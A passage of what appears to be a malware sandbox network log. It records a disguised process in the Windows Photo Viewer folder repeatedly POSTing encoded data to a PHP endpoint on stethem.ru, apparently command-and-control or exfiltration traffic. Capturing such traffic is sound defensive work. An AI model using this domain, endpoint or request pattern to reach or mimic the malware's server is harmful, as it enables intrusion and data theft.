Dec 28, 2024 22:18:35.479672909 CET	2472	OUT	Data Raw: 35 0d 0b 3e 04 29 37 1f 35 2a 3d 5f 2b 54 54 46 0b 07 31 29 0c 0b 3d 35 0e 54 29 1c 33 06 17 12 07 35 02 01 2b 33 08 22 3c 3a 38 53 36 0e 11 00 24 07 2a 18 3f 3e 25 0c 0b 20 31 2d 31 5a 3b 09 01 07 3e 3f 0b 2e 30 0f 07 28 0d 5e 33 0e 2d 1a 38 21 Data Ascii: 5>)75=_+TTF1)=5T)35+3"<:8S6$?>% 1-1Z;>?.0(^3-8!:$\/'4&_^R66U?#2"1<-",<S2>4-;!0"<]0<5/&656;!$43=PR<-)#1&Q2T<><<%] >[]^21(218#'8_5&+5.>8#'2<*%1/:+>&0=C,Z8\]8\/,=,S2V%B
Dec 28, 2024 22:18:35.479715109 CET	2472	OUT	Data Raw: 0e 00 3b 5c 0a 58 27 25 0b 33 26 5a 20 54 27 29 3f 5c 37 03 20 2a 3a 57 12 5c 07 1f 09 17 1e 1c 20 5b 22 58 07 09 33 14 26 2f 3e 06 3f 04 15 2c 30 09 5f 1b 0e 00 3c 5c 2c 07 2f 2e 3b 5b 0e 52 36 32 14 1b 38 35 07 45 0e 02 2a 01 38 37 00 22 37 3a Data Ascii: ;\X'%3&Z T')?\7 :W\ ["X3&/>?,0_<\,/.;[R6285E87"7:=_/-33^3T0?>:W5S;($3!^;^5,T=-0;? ><+Z:83R,9%9 >E">:=:;+:)]4+#[?=PV4$T<^#;..2;=57,*+0'T^X#;8
Dec 28, 2024 22:18:35.479815006 CET	4944	OUT	Data Raw: 23 2f 3a 33 3d 25 2e 39 3e 2a 2a 2c 3a 2a 5f 0f 07 3a 2e 56 35 28 3f 46 29 54 25 39 23 02 35 24 30 3e 38 12 28 01 06 52 0d 1f 30 22 08 2a 09 5d 3d 2c 0b 52 0a 00 21 13 0e 59 3c 39 32 2c 2c 1b 37 25 24 53 34 06 0a 5c 39 01 38 1f 31 3d 1f 1a 3e 0a Data Ascii: #/:3=%.9>*,:_:.V5(?F)T%9#5$0>8(R0"]=,R!Y<92,,7%$S4\981=>2+3_0<Z!Y1/1';+"-S"[=_7_,"638?U1?-@&=7_"</%3?X#WUR_69(6!1(2#($=Y"3"(:\$(:2A[S$)&?*0:5)<P$;U<9'/5-23>!?3=01
Dec 28, 2024 22:18:35.479840994 CET	2472	OUT	Data Raw: 31 56 22 27 3d 28 20 5a 0a 05 1a 3b 31 05 27 2f 25 21 39 2b 0f 57 11 13 3d 2a 2c 10 23 2a 31 04 2b 5d 25 58 31 04 2f 28 3a 05 1c 23 35 31 01 06 13 5b 26 3e 3e 2e 01 2e 30 27 5f 0f 3e 38 02 24 2e 38 5c 12 38 3c 0d 2d 22 22 35 39 31 24 39 44 24 00 Data Ascii: 1V"'=( Z;1'/%!9+W=,#1+]%X1/(:#51[&>>..0'_>8$.8\8<-""591$9D$]Y^4%-1+.7%7:P;2=+U+95><25;;52'+?<1<+.3/7W'+6'/RV?[,-.Y>><'V)S#3-E0.(%:\S,;!+^#@09 ;.5<2<!4"=)<>T:5- _*0S8
Dec 28, 2024 22:18:35.479893923 CET	4944	OUT	Data Raw: 31 2a 3f 5f 27 31 0b 05 36 2c 00 24 0e 38 2a 2d 0a 07 59 2c 08 5e 02 17 2d 28 22 3c 33 01 15 3a 07 56 0f 39 3f 06 35 50 28 3c 34 53 34 58 57 0f 20 31 3c 23 24 28 02 3c 38 3d 00 00 3c 25 35 16 3e 2d 06 21 3d 3e 23 01 20 26 0e 1f 31 06 20 26 37 02 Data Ascii: 1?_'16,$8-Y,^-("<3:V9?5P(<4S4XW 1<#$(<8=<%5>-!=># &1 &7?1Y&S>V$> $1[3U)Z2W"([<])7>:"_2^8[%[I/7 +:+<!X%.<^=7"8?_03= %:$$B0)A87)X+A0612<4Z>9&"TT%<=1W?$W9U8-&5 1>(4U/;;:%=$5Z
Dec 28, 2024 22:18:35.479999065 CET	4944	OUT	Data Raw: 0f 02 3f 1f 05 3d 3e 14 37 0c 3d 5f 27 06 28 2e 38 5d 0a 1f 39 02 2c 12 30 21 52 17 39 30 5c 2e 3c 5e 16 5c 38 5f 07 1f 3e 3a 3d 29 3a 02 2b 3c 3a 5b 3a 3b 05 56 20 5c 23 5a 18 27 3b 05 1a 59 3b 1c 02 1c 3c 5f 34 25 33 2a 05 22 3e 3c 50 0c 0d 54 Data Ascii: ?=>7=_'(.8]9,0!R90\.<^\8_>:=):+<:[:;V \#Z';Y;<_4%3"><PT)^4!<?/\)!,>_3.<? _A3E&<W B)V5 ";=0 20((":-:<$[Z$"(T2*%!-W_01G6=0^6$Y5918:.=^C.WS^#Z=1=#2X_T:T$;:<<Z2;%1?9?<
Dec 28, 2024 22:18:35.599164963 CET	2472	OUT	Data Raw: 08 09 0b 39 31 25 39 3e 24 02 32 24 33 15 3e 3a 36 41 21 05 34 59 29 0a 3e 32 14 10 03 01 15 3e 04 06 3a 5a 33 54 2c 09 33 00 07 23 23 1b 21 14 38 33 32 1e 33 5c 0b 36 33 53 12 26 04 56 3e 1a 0a 2b 09 24 04 56 2b 15 3d 25 0b 3f 0a 2d 21 27 3a 12 Data Ascii: 91%9>$2$3>:6A!4Y)>2>:Z3T,3##!8323\63S&V>+$V+=%?-!':#%2=>E<<+],?!>>/2/,^?Q65R(:Q@+-)_0T>S?=:0(![= X308'0R=9 3<)?&894[1(+1>#"^=#(RT]X9=<4)!X -&+"B4
Dec 28, 2024 22:18:35.599256992 CET	4944	OUT	Data Raw: 3e 0e 2c 25 32 17 3c 0b 25 5d 28 54 2b 3f 52 28 05 24 5d 37 0a 38 30 31 3d 3b 02 5a 3d 21 0d 5f 38 57 39 36 0a 09 37 3c 27 3a 23 20 39 28 00 1d 2b 38 03 1c 0a 2a 05 27 3f 2e 18 19 06 32 55 1a 20 3d 04 32 32 20 3b 3e 08 1e 2f 16 08 28 24 2a 3b 5f Data Ascii: >,%2<%](T+?R($]7801=;Z=!_8W967<':# 9(+8'?.2U =22 ;>/($;_3;0>461%A@;;>/].]:>=?)#^3^:?"Z!))/"<$0U.\+R"1$^&,17<0->-1>"#/W76$.?06X,0\"1*T8_?G0W7Y*Z5<+ #>: #
Dec 28, 2024 22:18:36.134447098 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:37.668978930 CET	800	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlBBRnd%2BDMwuwXd%2BGKI821rvSSkCNt8NlqKHzLxBUSzlJp%2FEx5lIZpjguneoIJ7WrWPYIQm5lsx6ard3DjwEFR0OGy2FX9U8dwtazbfpBE8HP2f0CpEYL47%2F37e5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949572e99a7c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3326&min_rtt=2015&rtt_var=3378&sent=70&recv=193&lost=0&retrans=0&sent_bytes=25&recv_bytes=181065&delivery_rate=116762&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0
Dec 28, 2024 22:18:37.678129911 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue
Dec 28, 2024 22:18:38.001485109 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:38.546721935 CET	950	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwKrj8tVJ8ej8g1Tw%2BawdYeFtn79P4Khy4TNioUdp%2BEj2KAUjYJYByg%2FbpU2%2BxGeem2KxB27mRkrD9OBZ2hrb9greB%2Fa7ZBquHsBPpkBSwhjy0bcq%2BM0kb7MKhWI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94957e8b2e7c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5338&min_rtt=2014&rtt_var=6472&sent=76&recv=199&lost=0&retrans=0&sent_bytes=850&recv_bytes=183152&delivery_rate=1407907&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 21 0d 34 26 3e 1d 20 20 21 1e 30 5f 2a 14 2b 51 24 01 3c 20 31 5b 33 29 24 1e 2a 0d 20 54 24 5f 31 06 27 58 2a 1f 27 12 0f 01 26 13 28 51 06 12 21 44 35 3f 33 10 3a 04 3c 04 24 30 21 18 22 2d 14 02 27 39 25 50 25 28 3d 5a 23 2a 3c 0b 2f 5c 36 0c 2a 00 23 1a 28 57 2e 13 34 01 2e 57 02 13 27 53 2b 2d 27 51 22 08 27 1e 33 01 3c 07 36 11 25 52 30 39 2e 1e 23 2d 37 1a 3e 2c 0a 5f 34 37 2f 57 3d 00 37 13 37 06 2c 50 2b 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a Data Ascii: 98!4&> !0_+Q$< 1[3)$ T$_1'X'&(Q!D5?3:<$0!"-'9%P%(=Z#</\6*#(W.4.W'S+-'Q"'3<6%R09.#-7>,_47/W=77,P+"U-.V5VT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:35.398268938 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:35.751216888 CET	1072	OUT	Data Raw: 5a 5c 58 55 5b 45 51 50 5c 57 57 56 5a 59 54 51 55 5a 59 5d 55 57 57 5e 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z\XU[EQP\WWVZYTQUZY]UWW^ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9\>+=-)2/?$07/*,Y'R52X2%E3%X;![",\-2
Dec 28, 2024 22:18:36.482707977 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:36.726767063 CET	792	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlmWuoZG2UvmTXkCNDgR5MaB1PzXGjEGQgBTwAASz2i96%2BmGkU%2BABYv8dTvTEPK9FVEW96o1yBgFESUWvlXvSQQKi2NcQawxsOOdwM%2BdfiYvdNOJBBPQN0rPKSWJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495750fe0334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4604&min_rtt=1919&rtt_var=6091&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=62379&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:36.993808985 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:37.355578899 CET	1072	OUT	Data Raw: 5a 5c 58 5c 5e 48 54 5c 5c 57 57 56 5a 54 54 55 55 53 59 5e 55 56 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z\X\^HT\\WWVZTTUUSY^UVWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:+#$Y?-&&<4[&$3\":<.9'$>;!*\%6>'898<![",\-
Dec 28, 2024 22:18:38.112088919 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:38.365149021 CET	793	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cy0Vllv1A2147800bZuZqAZDHEWMI%2Fe72Szt6oYdkDkT8qdQot1iUb9JHFT%2Bgwvom28ttpTrfG0MydeZwRS8Vfp66pNBKb7GiswRZ1%2BqsRUO1Fd4mBDr4CcKFChB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94957f2efa42b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3058&min_rtt=1704&rtt_var=3347&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=116464&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:38.614193916 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:38.969307899 CET	1072	OUT	Data Raw: 5f 5f 5d 54 5b 45 54 5d 5c 57 57 56 5a 5f 54 50 55 56 59 5b 55 5d 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __]T[ET]\WWVZ_TPUVY[U]WXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9+#(+-18_0B7\#_48_#&>,Q"_2&!%(),![",\-*
Dec 28, 2024 22:18:39.791810989 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:40.046103954 CET	798	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lz3QYfkIFCmFG%2FCRMiZv36FHr8LfTdnMHPd1YRRS2mCv%2FPdUGuzZPuYOyrNj1f7YWZK%2FpWXlBlmwBeQ71%2FLSVv6D6yAS8XgOenQQUwPngYBAL%2FsdFfILDbCw0J%2BC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949589a956efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5513&min_rtt=3389&rtt_var=5520&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=71617&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:40.845496893 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:41.203747034 CET	1072	OUT	Data Raw: 5f 59 58 52 5e 49 51 51 5c 57 57 56 5a 5f 54 55 55 56 59 58 55 54 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YXR^IQQ\WWVZ_TUUVYXUTWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9X)?(==%/8['7)08X0###%9%+68![",\-*
Dec 28, 2024 22:18:41.928742886 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:42.171760082 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BfBB7qIZ1XetXx5arBktqFw20a11nNhBxtVxoW8BNQT0coBgWqLyKnZCcLO4vtJju2Yjf%2BLTmN8CM%2BTat8armh0pHYZtY0E4%2FK0xcyonMIxU%2FgbGfiajVn0U0ek"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94959719b2438c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3238&min_rtt=1602&rtt_var=3874&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=99353&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:42.430300951 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:42.782350063 CET	1072	OUT	Data Raw: 5a 59 58 51 5e 43 51 55 5c 57 57 56 5a 5b 54 51 55 54 59 5e 55 56 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZYXQ^CQU\WWVZ[TQUTY^UVWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:+0 ^?>!X&4Z$'# _$.)?$0S!"$66E3:-,![",\-:
Dec 28, 2024 22:18:43.562958002 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:43.804864883 CET	801	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iK%2FcQtSdnL8qvoJgHT35WZ7iHdgKQ741IDN%2BbgJWv%2BK8PAQ6E0q2Qg%2F%2B5%2FHDz6yxqtSBiF7tl5sKKUqhiJZphN9R5xdCQxMdVjm6bxKWm%2Ba6uhMsCFKRSCoTS8t5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495a1399d0f55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7417&min_rtt=1644&rtt_var=12163&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=30524&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:43.871838093 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:44.219293118 CET	1788	OUT	Data Raw: 5f 59 58 5c 5b 44 51 52 5c 57 57 56 5a 55 54 57 55 57 59 5c 55 56 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YX\[DQR\WWVZUTWUWY\UVWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9= =.=X%<'$ )',9#3-$P5U22='^>/![",\-
Dec 28, 2024 22:18:44.965203047 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:45.205291986 CET	933	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbCFfD8Cu7yDerllVLyn8tKgqU4Heh9zqVt2BMVrJ%2FB15fUZUxXbw73gcBIBO45nz8jh4K8OOY2vpNMXP2hwBFT9YViS966ggkCE1OWQjOJq49Ct1cG8DDSR%2FtCh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495aa1d847d11-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4905&min_rtt=1950&rtt_var=6641&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=57051&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 51 34 1b 21 08 36 30 35 57 26 39 04 52 3c 37 23 5d 2b 0e 22 03 27 07 27 0a 29 0d 33 08 30 39 00 5a 26 3d 3d 0c 24 3f 2e 59 24 39 28 51 06 12 21 40 22 3f 3f 54 39 2a 34 01 24 30 04 41 35 13 3a 05 30 2a 31 50 31 3b 3d 12 22 39 06 0f 3b 04 00 0a 29 17 0d 1b 28 32 2e 5f 23 2b 2e 57 02 13 27 1a 28 10 3f 51 35 21 33 59 30 2b 33 5d 20 3f 00 0b 30 3a 29 0a 34 13 06 01 2a 5a 20 5c 37 09 09 53 2a 3a 24 07 34 06 30 1c 2b 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a Data Ascii: 98"Q4!605W&9R<7#]+"'')309Z&==$?.Y$9(Q!@"??T94$0A5:01P1;="9;)(2._#+.W'(?Q5!3Y0+3] ?0:)4Z \7S:$40+"U-.V5VT
Dec 28, 2024 22:18:45.396974087 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:43.995642900 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:44.344316959 CET	1072	OUT	Data Raw: 5f 5c 5d 51 5e 48 54 57 5c 57 57 56 5a 5e 54 50 55 53 59 5b 55 50 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _\]Q^HTW\WWVZ^TPUSY[UPW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)U4_(!2<Y'Z7)Y,<]&.$W51&%'&,<![",\-.
Dec 28, 2024 22:18:45.173430920 CET	25	IN	HTTP/1.1 100 Continue
